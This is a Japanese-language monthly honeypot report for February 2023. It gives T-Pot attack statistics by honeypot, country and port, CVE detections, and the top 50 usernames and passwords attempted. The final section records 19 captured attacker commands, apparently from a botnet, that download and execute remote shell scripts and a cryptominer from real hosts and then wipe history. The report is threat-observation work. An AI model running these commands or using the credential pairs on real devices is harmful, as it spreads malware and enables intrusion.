ハニーポット運用(月次報告:2023年2月)
1.SECCON 2022 電脳会議 参加
- 2023年2月11日と2月12日に開催されたSECCON 2022 電脳会議 に参加した。
- よわよわエンジニアでもイベントや勉強会に参加するとモチベーションアップにつながるので有難いことである。
T-Potにて1か月運用した結果を記載する。
今月のChangelog
更新無し。
前提条件
運用日時:2023年2月10日-2023年2月21日
運用期間:11日
結果
①各ハニーポットで検知したAttack件数
- T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
No | ハニーポット | 件数 | 先月順位 |
---|---|---|---|
1 | Honeytrap | 192,798 | 2(↑) |
2 | Heralding | 177,978 | 5(↑) |
3 | Ddospot | 129,894 | 1(↓) |
4 | Cowrie | 117,313 | 3(↓) |
5 | Dionaea | 74,989 | 4(↑) |
6 | Mailoney | 9,227 | 7(↑) |
7 | Adbhoney | 8,855 | 9(↑) |
8 | Tanner | 1,816 | 10(↑) |
9 | Redishoneypot | 909 | 8(↓) |
10 | ConPot | 887 | 13(↑) |
11 | Ciscoasa | 731 | 6(↓) |
12 | CitrixHoneypot | 676 | 11(↓) |
13 | ElasticPot | 290 | 13(→) |
14 | Ipphoney | 67 | 14(→) |
15 | Dicompot | 61 | 15(→) |
- Result
- Honeytrapへのアクセスが増加傾向にあった
②攻撃元の国名と件数(Top 20)
- 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。
No | 攻撃元の国名 | 件数 | 先月順位 |
---|---|---|---|
1 | Russia | 176,848 | 5(↑) |
2 | United States | 107,551 | 2(→) |
3 | Brazil | 101,358 | 1(↓) |
4 | Netherlands | 67,924 | 6(↑) |
5 | China | 42,793 | 3(↓) |
6 | India | 19,569 | 8(↑) |
7 | United Kingdom | 13,429 | 7(→) |
8 | Vietnam | 11,975 | 17(↑) |
9 | Sweden | 11,270 | 10(↑) |
10 | Hong Kong | 9,341 | 14(↑) |
11 | Latvia | 9,210 | 12(↑) |
12 | Monaco | 7,694 | 圏外(↑) |
13 | Iran | 6,333 | 13(→) |
14 | Germany | 6,143 | 15(↑) |
15 | Panama | 5,911 | 圏外(↑) |
16 | Japan | 5,267 | 16(→) |
17 | South Korea | 5,162 | 9(↓) |
18 | Italy | 4,997 | 圏外(↑) |
19 | Indonesia | 4,738 | 18(↓) |
20 | Saudi Arabia | 4,640 | 圏外(↑) |
- Result
- ロシアからのアクセスが増える一方で中国からのアクセスが少ない傾向にあった
上位10ヵ国のアクセスポートの分布は以下の通り
攻撃元の国名 | 宛先ポート | 件数 |
---|---|---|
Russia | 5900 | 122,465 |
Russia | 445 | 4,544 |
Russia | 23 | 1,537 |
Russia | 22 | 592 |
Russia | 34567 | 555 |
Russia | 6379 | 487 |
Russia | 3389 | 222 |
Russia | 123 | 176 |
Russia | 80 | 170 |
Russia | 443 | 153 |
United States | 123 | 5,330 |
United States | 53 | 2,249 |
United States | 22 | 2,228 |
United States | 445 | 1,159 |
United States | 5555 | 1,066 |
United States | 23 | 811 |
United States | 2323 | 330 |
United States | 80 | 265 |
United States | 6379 | 246 |
United States | 81 | 242 |
Brazil | 53 | 97,066 |
Brazil | 445 | 2,790 |
Brazil | 123 | 297 |
Brazil | 23 | 115 |
Brazil | 22 | 82 |
Brazil | 2323 | 64 |
Brazil | 1935 | 53 |
Brazil | 8131 | 53 |
Brazil | 5555 | 51 |
Brazil | 60023 | 41 |
Netherlands | 5900 | 53,759 |
Netherlands | 123 | 265 |
Netherlands | 19 | 124 |
Netherlands | 22 | 121 |
Netherlands | 23 | 50 |
Netherlands | 5038 | 42 |
Netherlands | 2020 | 40 |
Netherlands | 2050 | 40 |
Netherlands | 3376 | 40 |
Netherlands | 3390 | 40 |
China | 22 | 3,667 |
China | 23 | 2,332 |
China | 3389 | 1,757 |
China | 445 | 1,473 |
China | 123 | 1,305 |
China | 53 | 662 |
China | 21 | 617 |
China | 60023 | 536 |
China | 1433 | 481 |
China | 2375 | 387 |
India | 445 | 10,518 |
India | 22 | 1,476 |
India | 23 | 165 |
India | 123 | 139 |
India | 2323 | 91 |
India | 6379 | 56 |
India | 3375 | 40 |
India | 3391 | 40 |
India | 10001 | 36 |
India | 60023 | 32 |
United Kingdom | 25 | 7,230 |
United Kingdom | 123 | 369 |
United Kingdom | 22 | 253 |
United Kingdom | 8080 | 163 |
United Kingdom | 9001 | 90 |
United Kingdom | 53 | 83 |
United Kingdom | 9000 | 76 |
United Kingdom | 445 | 69 |
United Kingdom | 1515 | 63 |
United Kingdom | 3389 | 59 |
Vietnam | 445 | 7,087 |
Vietnam | 22 | 794 |
Vietnam | 123 | 45 |
Vietnam | 23 | 33 |
Vietnam | 5900 | 20 |
Vietnam | 5555 | 15 |
Vietnam | 1433 | 9 |
Vietnam | 80 | 8 |
Vietnam | 3052 | 5 |
Vietnam | 3389 | 5 |
Sweden | 22 | 2,088 |
Sweden | 80 | 636 |
Sweden | 5555 | 111 |
Sweden | 5900 | 98 |
Sweden | 123 | 94 |
Sweden | 2323 | 76 |
Sweden | 23 | 37 |
Sweden | 445 | 24 |
Sweden | 443 | 15 |
Sweden | 60023 | 3 |
Hong Kong | 53 | 2,490 |
Hong Kong | 1025 | 238 |
Hong Kong | 445 | 148 |
Hong Kong | 5555 | 148 |
Hong Kong | 8125 | 107 |
Hong Kong | 81 | 99 |
Hong Kong | 123 | 74 |
Hong Kong | 2308 | 73 |
Hong Kong | 22 | 70 |
Hong Kong | 2121 | 67 |
③検知したCVEの脆弱性と件数
- Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
No | CVE ID | Count |
---|---|---|
1 | CVE-2020-11899 | 384,940 |
2 | CVE-2020-11910 | 11 |
3 | CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 | 9 |
- Result
- 先月から変更なし
④よく攻撃されるユーザ名
- ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
No | ユーザ名 | 件数 |
---|---|---|
1 | root | 5,569 |
2 | admin | 1,618 |
3 | sa | 913 |
4 | 856 | |
5 | 22 | 400 |
6 | user | 283 |
7 | !root | 199 |
8 | 2Wire | 199 |
9 | support | 179 |
10 | guest | 158 |
11 | 666666 | 143 |
12 | Admin | 135 |
13 | blank | 118 |
14 | factory | 107 |
15 | test | 106 |
16 | cameras | 105 |
17 | adm | 103 |
18 | debug | 102 |
19 | unknown | 100 |
20 | 0 | 99 |
21 | ubnt | 97 |
22 | ubuntu | 97 |
23 | $ALOC$ | 96 |
24 | pi | 96 |
25 | oracle | 91 |
26 | www | 86 |
27 | anonymous | 76 |
28 | web | 73 |
29 | ftp | 68 |
30 | data | 67 |
31 | postgres | 67 |
32 | supervisor | 64 |
33 | db | 63 |
34 | default | 63 |
35 | wwwroot | 61 |
36 | user1 | 50 |
37 | tech | 47 |
38 | ftpuser | 46 |
39 | steam | 45 |
40 | service | 42 |
41 | centos | 35 |
42 | mysql | 33 |
43 | Administrator | 32 |
44 | admin1 | 30 |
45 | dolphinscheduler | 30 |
46 | git | 30 |
47 | testuser | 30 |
48 | administrator | 29 |
49 | esuser | 29 |
50 | mother | 27 |
⑤よく攻撃されるパスワード
- パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
No | パスワード | 件数 |
---|---|---|
1 | admin | 1,093 |
2 | 969 | |
3 | password | 763 |
4 | 123456 | 721 |
5 | 12345678 | 426 |
6 | 12345 | 386 |
7 | Password | 347 |
8 | blank | 304 |
9 | 1234 | 303 |
10 | 0 | 251 |
11 | root | 245 |
12 | user | 208 |
13 | 666666 | 191 |
14 | 00000000 | 177 |
15 | ubnt | 165 |
16 | 123 | 161 |
17 | support | 155 |
18 | alpine | 138 |
19 | hi3518 | 134 |
20 | master | 116 |
21 | Aa123456. | 113 |
22 | 1 | 110 |
23 | unknown | 110 |
24 | 1q2w3e4r | 109 |
25 | Passw0rd | 108 |
26 | backup | 102 |
27 | !ishtar | 100 |
28 | factory | 100 |
29 | cameras | 99 |
30 | 1234admin | 98 |
31 | pass | 97 |
32 | synnet | 96 |
33 | 1234567890 | 95 |
34 | 54321 | 94 |
35 | _Cisco | 93 |
36 | 10023 | 91 |
37 | 7ujMko0admin | 89 |
38 | 1qaz2wsx | 78 |
39 | 888888 | 73 |
40 | guest | 71 |
41 | 1234qwer | 70 |
42 | 11111111 | 68 |
43 | 123123 | 67 |
44 | passw0rd | 67 |
45 | 1111 | 55 |
46 | service | 54 |
47 | 5up | 52 |
48 | test | 52 |
49 | system | 50 |
50 | Win1doW$ | 49 |
- Result
admin 7ujMko0admin
とadmin:Win1doW$
はIoT機器に対するよく使われるユーザ名:パスワードの組み合わせである
⑥今月のmasscanとZmap
massscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- 特記事項は無し。
最後に
- 今月のアクセス
- blackcatというBotnetからのアクセスを確認した。IPアドレスは
109.206.240.231
から提供されている
- blackcatというBotnetからのアクセスを確認した。IPアドレスは
No | アクセス |
---|---|
1 | cd /data/local/tmp/; busybox wget hxxp://109.206.240.9/w.sh; sh w.sh; curl hxxp://109.206.240.9/c.sh; sh c.sh; wget hxxp://109.206.240.9/wget.sh; sh wget.sh; curl hxxp://109.206.240.9/wget.sh; sh wget.sh; busybox wget hxxp://109.206.240.9/wget.sh; sh wget.sh; busybox curl hxxp://109.206.240.9/wget.sh; sh wget.sh |
2 | cd /data/local/tmp/; busybox wget hxxp://botnet.blackcat7.cyou//w.sh; sh w.sh; curl hxxp://botnet.blackcat7.cyou//c.sh; sh c.sh; wget hxxp://botnet.blackcat7.cyou//wget.sh; sh wget.sh; curl hxxp://botnet.blackcat7.cyou//wget.sh; sh wget.sh; busybox wget hxxp://botnet.blackcat7.cyou//wget.sh; sh wget.sh; busybox curl hxxp://botnet.blackcat7.cyou//wget.sh; sh wget.sh |
3 | cd /data/local/tmp/; busybox wget hxxp://85.209.134.231/w.sh; sh w.sh; curl hxxp://85.209.134.231/c.sh; sh c.sh; wget hxxp://85.209.134.231/wget.sh; sh wget.sh; curl hxxp://85.209.134.231/wget.sh; sh wget.sh; busybox wget hxxp://85.209.134.231/wget.sh; sh wget.sh; busybox curl hxxp://85.209.134.231/wget.sh; sh wget.sh |
4 | cd /data/local/tmp/; busybox wget hxxp://167.172.79.33/w.sh; sh w.sh; curl hxxp://167.172.79.33/c.sh; sh c.sh; wget hxxp://167.172.79.33/wget.sh; sh wget.sh; curl hxxp://167.172.79.33/wget.sh; sh wget.sh; busybox wget hxxp://167.172.79.33/wget.sh; sh wget.sh; busybox curl hxxp://167.172.79.33/wget.sh; sh wget.sh |
5 | cd /data/local/tmp/; busybox wget hxxp://139.162.63.250/w.sh; sh w.sh; curl hxxp://139.162.63.250/c.sh; sh c.sh; wget hxxp://139.162.63.250/wget.sh; sh wget.sh; curl hxxp://139.162.63.250/wget.sh; sh wget.sh; busybox wget hxxp://139.162.63.250/wget.sh; sh wget.sh; busybox curl hxxp://139.162.63.250/wget.sh; sh wget.sh |
6 | cd /data/local/tmp/; busybox wget hxxp://142.93.128.246/w.sh; sh w.sh; curl hxxp://142.93.128.246/c.sh; sh c.sh; wget hxxp://142.93.128.246/wget.sh; sh wget.sh; curl hxxp://142.93.128.246/wget.sh; sh wget.sh; busybox wget hxxp://142.93.128.246/wget.sh; sh wget.sh; busybox curl hxxp://142.93.128.246/wget.sh; sh wget.sh |
7 | cd /data/local/tmp/; busybox wget 109.206.240.231/w.sh; sh w.sh; curl 109.206.240.231/c.sh; sh c.sh; wget 109.206.240.231/wget.sh; sh wget.sh; curl 109.206.240.231/wget.sh; sh wget.sh; busybox wget 109.206.240.231/wget.sh; sh wget.sh; busybox curl 109.206.240.231/wget.sh; sh wget.sh |
8 | nproc;uname -a;cd /tmp;wget hxxp://58.135.80.99/a/miner.sh;bash miner.sh;cd /tmp;curl -sS hxxp://58.135.80.99/a/divu2|perl;wget -O - hxxp://58.135.80.99/a/divu2|perl;rm -rf div* miner.sh |
9 | cd /data/local/tmp/; rm -rf w.sh c.sh; busybox wget hxxp://107.189.5.161/w.sh; sh w.sh; curl hxxp://107.189.5.161/c.sh; sh c.sh |
10 | cd /data/local/tmp/; busybox wget hxxp://185.216.71.65/w.sh; sh w.sh; curl hxxp://185.216.71.65/c.sh; sh c.sh |
11 | cd /data/local/tmp/; busybox wget hxxp://193.42.33.21/w.sh; sh w.sh; curl hxxp://193.42.33.21/c.sh; sh c.sh |
12 | #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget hxxp://23.235.171.196:1211/112; curl -O hxxp://23.235.171.196:1211/112; chmod +x 112; ./112; rm -rf 123.sh; history -c; |
13 | cd /data/local/tmp/; busybox wget hxxp://141.255.160.234/w.sh; sh w.sh; curl hxxp://141.255.160.234/c.sh; sh c.sh |
14 | cd /data/local/tmp/; busybox wget hxxp://47.87.229.145/w.sh; sh w.sh; curl hxxp://47.87.229.145/c.sh; sh c.sh |
15 | cd /data/local/tmp/; busybox wget hxxp://149.127.237.221/w.sh; sh w.sh; curl hxxp://149.127.237.221/c.sh; sh c.sh |
16 | cd /data/local/tmp/; busybox wget hxxp://111.92.242.146/w.sh; sh w.sh; curl hxxp://111.92.242.146/c.sh; sh c.sh |
17 | cd /tmp ; wget 212.193.30.26/okay.sh ; sh okay.sh ; rm -rf okay.sh ; curl -O 212.193.30.26/okay.sh ; sh okay.sh ; rm -rf okay.sh ; history -c |
18 | cd /data/local/tmp/; busybox wget hxxp://100.43.163.61/w.sh; sh w.sh; curl hxxp://100.43.163.61/c.sh; sh c.sh |
19 | cd /data/local/tmp/; busybox wget hxxp://193.111.250.222/bins/w.sh; sh w.sh; curl hxxp://193.111.250.222/bins/c.sh; sh c.sh |
今月の作業BGM
曲名 | アーティスト | 備考 |
---|---|---|
Shape of You | Ed Sheeran | --- |